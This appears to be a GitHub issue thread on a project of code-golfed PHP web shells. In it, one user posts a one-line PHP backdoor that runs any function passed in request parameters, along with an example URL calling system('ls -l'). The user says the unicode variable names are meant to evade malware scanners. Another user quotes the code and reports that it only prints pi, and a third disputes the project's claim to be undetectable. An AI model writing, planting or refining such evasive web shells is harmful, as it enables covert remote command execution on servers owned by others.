search

s0md3v / nano

Nano is a family of PHP web shells which are code golfed for stealth.
434 stars 93 forks source link

nano / ninja easily detectable #7

Open foneyop opened 5 years ago

foneyop commented 5 years ago

hey bro, your backdoor is easily detectable. checkout php malware scanner. Also this will dump out a lot of php warnings on any current version of PHP.

Here is an alternate version that supports GET and POST and will bypass any current scanner by using unicode variable names, underscores and arrays.

The password comes by changing the variable names zc and xz

the code will execute the php command passed in the zc variable with the argument xz and will accept them from $_GET or $_POST

example: www.example.com/nano2.php?zc=system&zx=ls+-l

<?php $_qΔ[0]=array_merge(['zc'=>'','xz'=>'pi'],$_REQUEST);echo $_qΔ[0]['xz']($_qΔ[0]['zc']);

this could be shortened, but i think the previous version would make a more complex regex to detect: <?php $Δ=array_merge(['z'=>0,'x'=>'pi'],$_REQUEST);echo $Δ['x']($Δ['z']);

ghost commented 5 years ago

hey bro, your backdoor is easily detectable. checkout php malware scanner. Also this will dump out a lot of php warnings on any current version of PHP.

Here is an alternate version that supports GET and POST and will bypass any current scanner by using unicode variable names, underscores and arrays.

The password comes by changing the variable names zc and xz

the code will execute the php command passed in the zc variable with the argument xz and will accept them from $_GET or $_POST

example: www.example.com/nano2.php?zc=system&zx=ls+-l

<?php $_qΔ[0]=array_merge(['zc'=>'','xz'=>'pi'],$_REQUEST);echo $_qΔ[0]['xz']($_qΔ[0]['zc']);

this could be shortened, but i think the previous version would make a more complex regex to detect: <?php $Δ=array_merge(['z'=>0,'x'=>'pi'],$_REQUEST);echo $Δ['x']($Δ['z']);

First of all i really like your idea. And my issue come up when i try to test your code (the second code). it didn't show any result rather than random number as show below:

cat test.php: <?php $Δ=array_merge(['z'=>0,'x'=>'pi'],$_REQUEST);echo $Δ['x']($Δ['z']); url: localhost/test.php?zc=system&zx=ls+-la result: 3.1415926535898

i am new with web shell so i have no idea how to run your code. hope you reply. regards,

p410n3 commented 5 years ago

I also suggest to change the wording on the readme. "Fully undetectable" is a bold (and wrong) statement. Don't get me wrong, nice idea, but "undetectable" things dont't exist.

One can simply check using a whitelist of php files using nothing but find and diff commands. Also I have yet to see a base64decode command in the wild, except in poorly 'obfuscated' webshells (which are deobfiscated in seconds). So that could be marked by a scanner as "potential risk".

Basically, just change the wording :)